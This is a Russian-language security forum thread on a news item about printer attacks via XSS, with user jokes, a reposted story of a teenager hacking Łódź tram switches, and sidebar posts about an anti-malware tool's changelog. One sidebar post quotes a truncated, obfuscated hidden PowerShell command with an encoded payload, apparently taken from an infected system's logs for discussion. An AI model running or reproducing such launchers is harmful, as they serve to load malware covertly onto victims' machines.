Перейти к содержанию
AM_Bot

Осторожно: хакеры атакуют через принтер

Recommended Posts

AM_Bot

Для совершения атаки жертва должна посетить либо сайт злоумышленника, либо страницу, которая подвержена уязвимости межсайтового скриптинга. К счастью, метод работает лишь с принтерами, подключенными к локальной сети.

...

Прочитать всю новость »

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Lemmit

Хорошо, что хоть не атакуют через шредер. Жертв было бы больше. :)

По оригинальности атаки чувствуется, что способ придуман все-таки русскими.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

FX + NoScript! А вообще, это, я как-то даже никогда не задумывался, что так вообще может быть :shock:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Kokunov Aleksey

а вирусы в банкоматах хо хо не хохо?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Иван

Польский подросток при помощи модифицированного пульта дистанционного управления взломал систему управления транспортом города Лодзь. По словам полицейских, он виноват в сходе с рельс четырех трамваев. В результате происшествия двенадцать человек получили ранения. Суд по делам несовершеннолетних будет рассматривать его дело в связи с созданием угрозы общественной безопасности.

14-летний компьютерный гений переключал стрелки на трамвайных путях, и это послужило причиной ряда аварий.

Подросток сказал, что хотел просто пошутить. Хотя на допросе он признался, что сознался еще в трех случаях своего хулиганства с применением высоких технологий, сообщает The Register.

Мирослав Мицор (Miroslaw Micor), пресс-секретарь местной полиции, сообщил подробности подготовки преступления: «Он тщательно изучал трамваи и пути, а затем создал устройство, похожее на пульт дистанционного управления, и с его помощью манипулировал трамваями и стрелками».

Учителя отзываются о мальчике, как о прилежном ученике, который очень интересуется высокими технологиями.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×